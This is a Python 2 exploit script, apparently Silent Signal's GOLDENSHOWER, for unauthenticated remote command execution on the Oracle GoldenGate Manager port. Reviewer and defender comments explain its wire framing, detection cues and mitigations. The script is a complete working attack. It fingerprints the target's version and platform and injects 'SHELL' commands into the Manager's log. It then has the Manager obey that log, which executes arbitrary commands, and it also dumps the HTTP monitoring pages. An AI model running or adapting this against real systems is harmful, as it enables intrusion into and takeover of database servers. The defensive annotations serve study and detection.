#!/usr/bin/env python
# Sources:
# https://silentsignal.hu/docs/S2_Oracle_GoldenGate_GOLDENSHOWER.py
# https://blog.silentsignal.eu/2017/05/08/fools-of-golden-gate/
#
# GOLDENSHOWER - Oracle GoldenGate unauthenticated RCE by Silent Signal
#
# Tested with:
# Version 12.1.2.0.0 17185003 OGGCORE_12.1.2.0.0_PLATFORMS_130924.1316 Linux, x64, 64bit (optimized) Oracle 11g
# Version 12.1.2.0.0 17185003 OGGCORE_12.1.2.0.0T1_PLATFORMS_140313.1216 Windows x64 (optimized) Oracle 12c
#
# Nmap service fingerprint example:
# ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)========
# SF-Port7809-TCP:V=7.12%I=7%D=2/20%Time=DEADBEEF%P=x86_64-unknown-linux-gnu
# SF:%r(RPCCheck,2D,"\0\+\x20\x20ERROR\tMGR\x20did\x20not\x20recognize\x20th
# SF:e\x20command\.\0")%r(DNSVersionBindReq,28,"\0&\x20\x20ERROR\tMGR\x20Did
# SF:\x20Not\x20Recognize\x20Command\0")%r(DNSStatusRequest,28,"\0&\x20\x20E
# SF:RROR\tMGR\x20Did\x20Not\x20Recognize\x20Command\0")%r(afp,28,"\0&\x20\x
# SF:20ERROR\tMGR\x20Did\x20Not\x20Recognize\x20Command\0")%r(kumo-server,2D
# SF:,"\0\+\x20\x20ERROR\tMGR\x20did\x20not\x20recognize\x20the\x20command\.
# SF:\0");
#
# NOTE(review): this is a Python 2 script (print statements, str used as a
# byte buffer). It is kept here as a reference for what the GoldenGate
# Manager accepts on its TCP port without any credential exchange: every
# function below simply connects and sends a framed GGSCI command.
#
# Defender's notes, grounded in the code below:
#   * Wire framing is a 2-byte big-endian length prefix followed by the
#     GGSCI command text with spaces replaced by TAB (\x09). Traffic to the
#     Manager port from hosts that are not GoldenGate peers or admin
#     workstations, and in particular any "GGSCI\tSTART\tOBEY" or SHELL
#     keyword in that stream, is worth an alert.
#   * The Nmap fingerprint above is the Manager's rejection of unknown
#     input; it identifies an exposed Manager (default port 7809) from
#     the network without any GoldenGate knowledge.
#   * Mitigation is to keep the Manager port off untrusted networks,
#     restrict which source hosts may connect to it, and apply the
#     vendor's fixes for the 2017 advisory referenced in the sources above.
#     Exact fixed versions are not given on this page - confirm with Oracle.

import socket
import struct
import argparse

# Populated from the command line after argument parsing; all functions
# below read these module globals rather than taking parameters.
HOST = None
PORT = None
# "win" or "nix", derived from the text returned by version().
PLATFORM = None


def send_write(cmd):
    """Send one framed GGSCI request carrying *cmd* inside a SHELL line.

    The request is "GGSCI START OBEY x" followed on a new line by
    "SHELL,<cmd> <term_ch> ", tab-separated, length-prefixed. The author's
    stated intent (see the function name, the "WRITTEN" message and the
    follow-up in send_exec()) is that the Manager records this request into
    its ggserr.log; the details are in the blog post linked at the top -
    verify there, they are not visible in this code.

    Args:
        cmd: the shell command text to embed. Spaces in it become TABs
            because the replace() below is applied to the whole request.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    # Platform-specific trailing character from the author's tests:
    # "#" on *nix, "&" on Windows.
    term_ch = "#"
    if PLATFORM == "win":
        term_ch = "&"
    cmd_ggsci = "GGSCI START OBEY x\nSHELL,%s %s " % (cmd, term_ch)
    # GGSCI tokens on the wire are TAB-separated, not space-separated.
    cmd_ggsci = cmd_ggsci.replace(" ", "\x09")
    # 2-byte big-endian length prefix; payload length is capped at 65535.
    length = struct.pack(">H", len(cmd_ggsci))
    s.send(length + cmd_ggsci)
    # Single read; the Manager's reply (see the Nmap fingerprint) is short.
    r = s.recv(1024)
    print "[+] '%s' WRITTEN \nReceived: %s\n" % (cmd, repr(r))
    s.close()


def send_exec():
    """Ask the Manager to OBEY its own ggserr.log.

    Sends the framed command "GGSCI START OBEY ggserr.log" (tab-separated).
    Paired with send_write(): whatever the earlier requests caused the
    Manager to log is now read back as an OBEY script. No authentication
    step precedes this request.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    cmd = "GGSCI START OBEY ggserr.log".replace(" ", "\x09")
    length = struct.pack(">H", len(cmd))
    s.send(length + cmd)
    r = s.recv(1024)
    print "[+] EXECUTED - Received: %s\n" % (repr(r))
    s.close()


def monitor():
    """Fetch the Manager's HTTP monitoring pages and print their bodies.

    Uses plain HTTP GET against the same HOST:PORT for each of the paths
    listed below. The author flags Windows as untested for this path.
    Requires the third-party ``requests`` package; it is imported lazily so
    the rest of the script works without it.
    """
    if PLATFORM == "win":
        print "[!] Windows platform detected, this may not work!"
    import requests
    paths = ["messages", "registry", "statuschanges", "mpoints"]
    for p in paths:
        r = requests.get("http://%s:%d/%s" % (HOST, PORT, p))
        print "\n--- MONITOR - %s ---" % (p)
        print r.text


def version():
    """Query the Manager's version string and return it.

    Sends the framed "GGSCI\\tVERSION" command and returns the reply with
    its first five bytes dropped and TABs turned into spaces.

    Returns:
        The version text as a str (Python 2 bytes). r[5:] presumably skips
        the 2-byte length prefix plus a short status field - the exact
        layout is not shown here; compare with the Nmap fingerprint above.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    #cmd = "GGSCI VERSION".replace(" ","\x09")
    cmd = "GGSCI\tVERSION"
    length = struct.pack(">H", len(cmd))
    s.send(length + cmd)
    r = s.recv(1024)
    ver = r[5:].replace("\t", " ")
    print "[+] VERSION: %s\n" % (ver)
    s.close()
    return ver


def debug(cmd, l=None):
    """Send raw *cmd* with an optional overridden length prefix and print the reply.

    Args:
        cmd: raw request body, sent as-is (no TAB substitution).
        l: if given, used as the value of the 2-byte length prefix instead
           of len(cmd), so the declared and actual lengths may disagree.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    length = None
    if l is None:
        length = struct.pack(">H", len(cmd))
    else:
        length = struct.pack(">H", l)
    s.send(length + cmd)
    print "[+] Sent: %s" % (repr(length + cmd))
    r = s.recv(1024)
    print "[+] Received: %s\n" % (repr(r))
    s.close()


# --- command line -----------------------------------------------------------
# --host is not marked required; with it absent, HOST stays None and the
# first connect() in version() fails.
parser = argparse.ArgumentParser(
    description='GOLDENSHOWER - Oracle GoldenGate unauthenticated RCE by Silent Signal')
parser.add_argument("--host", help="Target host")
parser.add_argument("--port", help="Target port", type=int, default=7809)
parser.add_argument("--cmd", help="Command(s) to execute", nargs='*')
parser.add_argument(
    "--monitor", help="Dump information (incl. version) via HTTP monitoring functions", action="store_true")
parser.add_argument("--debugcmd", help="Send raw content", required=False)
parser.add_argument("--debuglen", help="Indicated size of raw content", type=int, default=None, required=False)
args = parser.parse_args()

HOST = args.host
PORT = args.port

# version() runs unconditionally: the platform decision below drives the
# terminator character used by send_write().
ver = version()
if "Windows" in ver:
    PLATFORM = "win"
    print "[+] Platform: Windows"
else:
    PLATFORM = "nix"
    print "[+] Platform: *nix"

# Each --cmd value is sent with send_write(); a single send_exec() follows.
if args.cmd:
    for c in args.cmd:
        send_write(c)
    send_exec()

if args.monitor:
    monitor()

if args.debugcmd:
    debug(args.debugcmd, args.debuglen)

# Signature: aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj0wNHZINFdfOVJmZw==